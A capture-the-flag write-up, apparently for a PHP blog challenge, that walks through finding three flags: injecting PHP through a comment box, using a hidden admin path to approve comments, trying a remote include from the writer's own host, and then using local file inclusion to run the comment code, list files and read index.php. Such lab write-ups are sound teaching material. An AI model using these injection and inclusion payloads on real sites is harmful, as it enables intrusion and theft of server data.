This challenge has 3 flags, and I've managed to get 2 of them so far:
Flag 0
The "blog post" indicates that the site is powered by php. So what happens if we just include some php in the comment input box?
<?php echo '<p>Hello World</p>'; ?>
First flag!
Flag 1
Looking at the page source shows a commented out anchor:
<h3>Comments</h3>
<!--<a href="?page=admin.auth.inc">Admin login</a>-->
Loading that path brings up an admin log in page. No flag yet, but what if we try just admin.inc
? Second flag! And we can approve comments, that's handy!
Flag 2
What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file maybe we could host it ourselves and inject some code for the target to execute.
Notice: Undefined variable: title in /app/index.php on line 30Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21
Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21
Ok, so I think this server cannot reach outside of it's own network for including files via php (not to mention the fact it says so in the one "post")
"This server can't talk to the outside world and nobody but me can upload files, so there's no risk in just using include()."
So is there anything we can include from within the network?
http://{ctf}/?page=http://127.0.0.1/admin.inc
Notice: Undefined variable: title in /app/index.php on line 30
Pending Comments
Warning: mysql_query(): Access denied for user ''@'localhost' (using password: NO) in /app/admin.inc.php on line 5
Warning: mysql_query(): A link to the server could not be established in /app/admin.inc.php on line 5
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /app/admin.inc.php on line 6
Not sure what it's worth, but we know that mysql is involved and that we can include local files, but we'll need to spend some more time figuring out what to include. Ideally it would be content under our control, so maybe we can post a comment and somehow include it.
Update 04/28/2019 Ok, combining what we've learned about flags 0 and 1, we can write some php code as a comment, approve it as admin, and now we need to execute it:
http://{ctf}/?page=http://127.0.0.1/index
will execute the php we've written and approved in the comments! But what does this challenge want us to do with that?
- I can echo content, including echo rendering Javascript in order to execute that on page load, no flag.
- I can write code to output system commands:
total 104 -rw-r--r-- 1 root root 278 Dec 12 07:43 000-default.conf -rw-r--r-- 1 root root 372 Dec 12 07:43 Dockerfile -rw-r--r-- 1 root root 356 Dec 12 07:43 admin.auth.inc.php -rw-r--r-- 1 root root 495 Dec 12 07:43 admin.inc.php -rw-r--r-- 1 root root 412 Dec 12 07:43 home.inc.php -rw-r--r-- 1 root root 1502 Apr 29 03:43 index.php -rw-r--r-- 1 root root 69889 Dec 12 07:43 php.ini drwxr-xr-x 2 root root 4096 Dec 12 07:43 posts -rw-r--r-- 1 root root 154 Dec 12 07:43 setup.sh Hi
- I can write code to read files, how's about we read index.php?
<?php readfile(index.php); ?>
?php // ^FLAG^$FLAG$ mysql_connect("localhost", "root", ""); mysql_select_db("level4"); $page = isset($_GET['page']) ? $_GET['page'] : 'home.inc'; if(strpos($page, ':') !== false && substr($page, 0, 5) !== "http:") $page = "home.inc"; if(isset($_POST['body'])) { mysql_query("INSERT INTO comments (page, body, approved) VALUES ('" . mysql_real_escape_string($page) . "', '" . mysql_real_escape_string($_POST['body']) . "', 0)"); if(strpos($_POST['body'], '<?php') !== false) echo '<p
BINGO All flags captured!